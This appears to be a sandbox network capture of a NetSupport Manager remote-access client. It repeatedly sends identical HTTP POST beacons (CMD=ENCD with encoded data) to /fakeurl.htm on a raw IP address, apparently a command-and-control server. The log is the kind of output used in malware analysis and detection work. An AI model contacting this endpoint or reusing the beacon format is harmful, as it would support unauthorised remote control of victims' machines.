Dec 10, 2024 09:01:03.036392927 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:03.136533976 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:03.239448071 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:03.338480949 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:03.438466072 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:03.538374901 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:03.639368057 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:03.739346981 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:03.841698885 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:03.941330910 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:04.099140882 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:04.502562046 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:04.602437973 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:04.703366995 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:04.803381920 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:04.904369116 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:05.004358053 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:05.104338884 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:05.205090046 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:05.305361986 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:05.405399084 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:05.506380081 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:05.607388020 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:05.707356930 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:05.807368040 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:05.911187887 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:06.011257887 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:06.109381914 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:06.210408926 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:06.311403036 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:06.412436962 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:06.513448954 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:06.614403009 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:06.714373112 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:06.815391064 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:06.916481972 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:07.017406940 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:07.118376970 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:07.218385935 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:07.318397045 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:07.421107054 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:07.520653009 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:07.619419098 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:07.720490932 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:07.821120024 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:07.924381971 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:08.021394968 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:08.121510983 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:08.222446918 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:08.322446108 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:08.423398972 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:08.523387909 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:08.623475075 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:08.723448992 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:08.824424982 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:08.927587032 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:09.028428078 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:09.141171932 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:09.351419926 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:09.451458931 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:09.552685022 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:09.652426958 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:09.753439903 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:09.855464935 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:09.954416037 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:10.057142019 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:10.155709982 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:10.256493092 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:10.357466936 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:10.457458973 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:10.558491945 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:10.659559011 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:10.759402990 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:10.863085985 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:10.963565111 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:11.063442945 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:11.167516947 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:11.264427900 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:11.367424965 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:11.465461016 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:11.566468000 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:11.705171108 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:11.804589987 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:11.905165911 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:12.008860111 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:12.107430935 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:12.207449913 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:12.308473110 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:12.408521891 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:12.509530067 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:12.610465050 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:12.711452007 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:01:12.812467098 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
